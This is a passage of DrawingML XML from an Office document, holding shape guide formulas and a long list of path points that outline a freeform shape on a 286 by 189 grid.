                  <a:gd name="T6" fmla="*/ 88 w 286"/>
                  <a:gd name="T7" fmla="*/ 20 h 189"/>
                  <a:gd name="T8" fmla="*/ 96 w 286"/>
                  <a:gd name="T9" fmla="*/ 20 h 189"/>
                  <a:gd name="T10" fmla="*/ 105 w 286"/>
                  <a:gd name="T11" fmla="*/ 23 h 189"/>
                  <a:gd name="T12" fmla="*/ 114 w 286"/>
                  <a:gd name="T13" fmla="*/ 26 h 189"/>
                  <a:gd name="T14" fmla="*/ 127 w 286"/>
                  <a:gd name="T15" fmla="*/ 24 h 189"/>
                  <a:gd name="T16" fmla="*/ 132 w 286"/>
                  <a:gd name="T17" fmla="*/ 22 h 189"/>
                  <a:gd name="T18" fmla="*/ 143 w 286"/>
                  <a:gd name="T19" fmla="*/ 9 h 189"/>
                  <a:gd name="T20" fmla="*/ 163 w 286"/>
                  <a:gd name="T21" fmla="*/ 3 h 189"/>
                  <a:gd name="T22" fmla="*/ 188 w 286"/>
                  <a:gd name="T23" fmla="*/ 5 h 189"/>
                  <a:gd name="T24" fmla="*/ 191 w 286"/>
                  <a:gd name="T25" fmla="*/ 22 h 189"/>
                  <a:gd name="T26" fmla="*/ 209 w 286"/>
                  <a:gd name="T27" fmla="*/ 34 h 189"/>
                  <a:gd name="T28" fmla="*/ 217 w 286"/>
                  <a:gd name="T29" fmla="*/ 50 h 189"/>
                  <a:gd name="T30" fmla="*/ 234 w 286"/>
                  <a:gd name="T31" fmla="*/ 52 h 189"/>
                  <a:gd name="T32" fmla="*/ 247 w 286"/>
                  <a:gd name="T33" fmla="*/ 59 h 189"/>
                  <a:gd name="T34" fmla="*/ 262 w 286"/>
                  <a:gd name="T35" fmla="*/ 62 h 189"/>
                  <a:gd name="T36" fmla="*/ 280 w 286"/>
                  <a:gd name="T37" fmla="*/ 71 h 189"/>
                  <a:gd name="T38" fmla="*/ 286 w 286"/>
                  <a:gd name="T39" fmla="*/ 77 h 189"/>
                  <a:gd name="T40" fmla="*/ 284 w 286"/>
                  <a:gd name="T41" fmla="*/ 88 h 189"/>
                  <a:gd name="T42" fmla="*/ 281 w 286"/>
                  <a:gd name="T43" fmla="*/ 97 h 189"/>
                  <a:gd name="T44" fmla="*/ 272 w 286"/>
                  <a:gd name="T45" fmla="*/ 112 h 189"/>
                  <a:gd name="T46" fmla="*/ 256 w 286"/>
                  <a:gd name="T47" fmla="*/ 124 h 189"/>
                  <a:gd name="T48" fmla="*/ 226 w 286"/>
                  <a:gd name="T49" fmla="*/ 137 h 189"/>
                  <a:gd name="T50" fmla="*/ 196 w 286"/>
                  <a:gd name="T51" fmla="*/ 149 h 189"/>
                  <a:gd name="T52" fmla="*/ 209 w 286"/>
                  <a:gd name="T53" fmla="*/ 171 h 189"/>
                  <a:gd name="T54" fmla="*/ 220 w 286"/>
                  <a:gd name="T55" fmla="*/ 177 h 189"/>
                  <a:gd name="T56" fmla="*/ 189 w 286"/>
                  <a:gd name="T57" fmla="*/ 189 h 189"/>
                  <a:gd name="T58" fmla="*/ 167 w 286"/>
                  <a:gd name="T59" fmla="*/ 169 h 189"/>
                  <a:gd name="T60" fmla="*/ 178 w 286"/>
                  <a:gd name="T61" fmla="*/ 151 h 189"/>
                  <a:gd name="T62" fmla="*/ 153 w 286"/>
                  <a:gd name="T63" fmla="*/ 139 h 189"/>
                  <a:gd name="T64" fmla="*/ 117 w 286"/>
                  <a:gd name="T65" fmla="*/ 166 h 189"/>
                  <a:gd name="T66" fmla="*/ 98 w 286"/>
                  <a:gd name="T67" fmla="*/ 170 h 189"/>
                  <a:gd name="T68" fmla="*/ 101 w 286"/>
                  <a:gd name="T69" fmla="*/ 165 h 189"/>
                  <a:gd name="T70" fmla="*/ 104 w 286"/>
                  <a:gd name="T71" fmla="*/ 160 h 189"/>
                  <a:gd name="T72" fmla="*/ 108 w 286"/>
                  <a:gd name="T73" fmla="*/ 153 h 189"/>
                  <a:gd name="T74" fmla="*/ 109 w 286"/>
                  <a:gd name="T75" fmla="*/ 144 h 189"/>
                  <a:gd name="T76" fmla="*/ 113 w 286"/>
                  <a:gd name="T77" fmla="*/ 145 h 189"/>
                  <a:gd name="T78" fmla="*/ 117 w 286"/>
                  <a:gd name="T79" fmla="*/ 146 h 189"/>
                  <a:gd name="T80" fmla="*/ 121 w 286"/>
                  <a:gd name="T81" fmla="*/ 147 h 189"/>
                  <a:gd name="T82" fmla="*/ 125 w 286"/>
                  <a:gd name="T83" fmla="*/ 146 h 189"/>
                  <a:gd name="T84" fmla="*/ 124 w 286"/>
                  <a:gd name="T85" fmla="*/ 139 h 189"/>
                  <a:gd name="T86" fmla="*/ 118 w 286"/>
                  <a:gd name="T87" fmla="*/ 132 h 189"/>
                  <a:gd name="T88" fmla="*/ 118 w 286"/>
                  <a:gd name="T89" fmla="*/ 125 h 189"/>
                  <a:gd name="T90" fmla="*/ 112 w 286"/>
                  <a:gd name="T91" fmla="*/ 122 h 189"/>
                  <a:gd name="T92" fmla="*/ 113 w 286"/>
                  <a:gd name="T93" fmla="*/ 112 h 189"/>
                  <a:gd name="T94" fmla="*/ 106 w 286"/>
                  <a:gd name="T95" fmla="*/ 108 h 189"/>
                  <a:gd name="T96" fmla="*/ 99 w 286"/>
                  <a:gd name="T97" fmla="*/ 105 h 189"/>
                  <a:gd name="T98" fmla="*/ 95 w 286"/>
                  <a:gd name="T99" fmla="*/ 104 h 189"/>
                  <a:gd name="T100" fmla="*/ 89 w 286"/>
                  <a:gd name="T101" fmla="*/ 98 h 189"/>
                  <a:gd name="T102" fmla="*/ 82 w 286"/>
                  <a:gd name="T103" fmla="*/ 99 h 189"/>
                  <a:gd name="T104" fmla="*/ 73 w 286"/>
                  <a:gd name="T105" fmla="*/ 101 h 189"/>
                  <a:gd name="T106" fmla="*/ 48 w 286"/>
                  <a:gd name="T107" fmla="*/ 113 h 189"/>
                  <a:gd name="T108" fmla="*/ 23 w 286"/>
                  <a:gd name="T109" fmla="*/ 108 h 189"/>
                  <a:gd name="T110" fmla="*/ 7 w 286"/>
                  <a:gd name="T111" fmla="*/ 83 h 189"/>
                  <a:gd name="T112" fmla="*/ 30 w 286"/>
                  <a:gd name="T113" fmla="*/ 50 h 189"/>
                  <a:gd name="T114" fmla="*/ 25 w 286"/>
                  <a:gd name="T115" fmla="*/ 24 h 189"/>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286"/>
                  <a:gd name="T175" fmla="*/ 0 h 189"/>
                  <a:gd name="T176" fmla="*/ 286 w 286"/>
                  <a:gd name="T177" fmla="*/ 189 h 189"/>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286" h="189">
                    <a:moveTo>
                      <a:pt x="23" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="155"/>
